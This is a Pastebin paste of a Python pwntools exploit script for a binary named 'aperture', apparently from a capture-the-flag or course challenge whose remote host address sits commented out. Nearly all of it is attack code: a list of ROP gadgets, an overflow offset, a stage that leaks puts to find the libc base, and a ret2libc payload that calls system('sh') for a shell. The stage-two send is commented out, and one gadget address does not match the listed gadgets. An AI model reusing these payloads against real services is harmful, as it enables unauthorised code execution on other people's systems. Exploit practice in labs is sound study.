Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- exec_path = "./aperture"
- context.binary = exec_path
- e = ELF(exec_path)
- log.info("context is: " + str(vars(context)))
- # Determine offsets
- #RBP=160 for first read
- offset=168
- libc = ELF('libc.so.6')
- puts_off = libc.symbols['puts']
- system_off = libc.symbols['system']
- ret_to_text=0x400992
- '''
- Gadgets
- 0x0000000000400d2c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
- 0x0000000000400d2e : pop r13 ; pop r14 ; pop r15 ; ret
- 0x0000000000400d30 : pop r14 ; pop r15 ; ret
- 0x0000000000400d32 : pop r15 ; ret
- 0x00000000004008a2 : pop rbp ; mov byte ptr [rip + 0x20180e], 1 ; ret
- 0x0000000000400841 : pop rbp ; mov edi, 0x602090 ; jmp rax
- 0x000000000040087e : pop rbp ; mov rsi, rax ; mov edi, 0x602090 ; jmp rdx
- 0x0000000000400d2b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
- 0x0000000000400d2f : pop rbp ; pop r14 ; pop r15 ; ret
- 0x0000000000400835 : pop rbp ; ret
- 0x0000000000400d33 : pop rdi ; ret
- 0x0000000000400cc1 : pop rdx ; ret
- 0x0000000000400d31 : pop rsi ; pop r15 ; ret
- 0x0000000000400ccb : pop rsi ; ret
- 0x0000000000400d2d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
- 0x00000000004008c4 : push rbp ; mov edi, 0x601e18 ; mov rbp, rsp ; call rax
- 0x0000000000400cc3 : push rbp ; mov rbp, rsp ; push rsi ; rep stosb byte ptr [rdi], al ; nop ; pop rsi ; ret
- 0x0000000000400cc7 : push rsi ; rep stosb byte ptr [rdi], al ; nop ; pop rsi ; ret
- 0x0000000000400cc8 : rep stosb byte ptr [rdi], al ; nop ; pop rsi ; ret
- 0x00000000004006f6 : ret
- 0x0000000000400792 : ret 0x2018
- 0x0000000000400a04 : ret 0x458b
- 0x0000000000400cbc : ret 0x480c
- 0x0000000000400c4d : ret 0x8b48
- 0x0000000000400865 : ret 0xc148
- 0x0000000000400b0c : ret 0xd089
- 0x0000000000400af3 : ret 0xeac1
- '''
- pop_rdi_ret=0x0000000000400d33
- pop_rsi_r15=0x0000000000400801
- # Craft payload stage 1
- pad=""
- pad+="A"*(offset)
- buf = ""
- buf += p64(pop_rdi_ret)
- buf += p64(e.got['puts'])
- buf += p64(e.plt['puts'])
- buf += p64(ret_to_text)
- p=process(exec_path)
- #p=remote('141.85.224.102','31342')
- #gdb.attach(p)
- #p.recvuntil('What color shall grace your banner? ')
- raw_input('Send payload? ')
- p.send(pad + buf)
- p.recvlines(1)
- puts_libc = u64(p.recv(6)+"\x00"+"\x00")
- log.info("Leaked puts is: {}".format(hex(puts_libc)))
- libc_base = puts_libc - libc.symbols['puts']
- system_addr = libc_base + system_off
- sh_address = libc_base + next(libc.search('sh\x00'))
- log.info("Leaked libc base addr is: {}".format(hex(libc_base)))
- log.info("Leaked system address is: {}".format(hex(system_addr)))
- log.info("Leaked binsh addr is: {}".format(hex(sh_address)))
- #log.info("Leaked dup2 addr is: {}".format(hex(dup2_addr)))
- pay2=""
- pay2+="A"*offset
- pay2+=p64(pop_rdi_ret) + p64(sh_address) + p64(system_addr)
- #pay2+=p32(sh_address)
- #raw_input('send payload2?')
- #p.recvuntil('What color shall grace your banner? ')
- #p.sendline(pay2)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
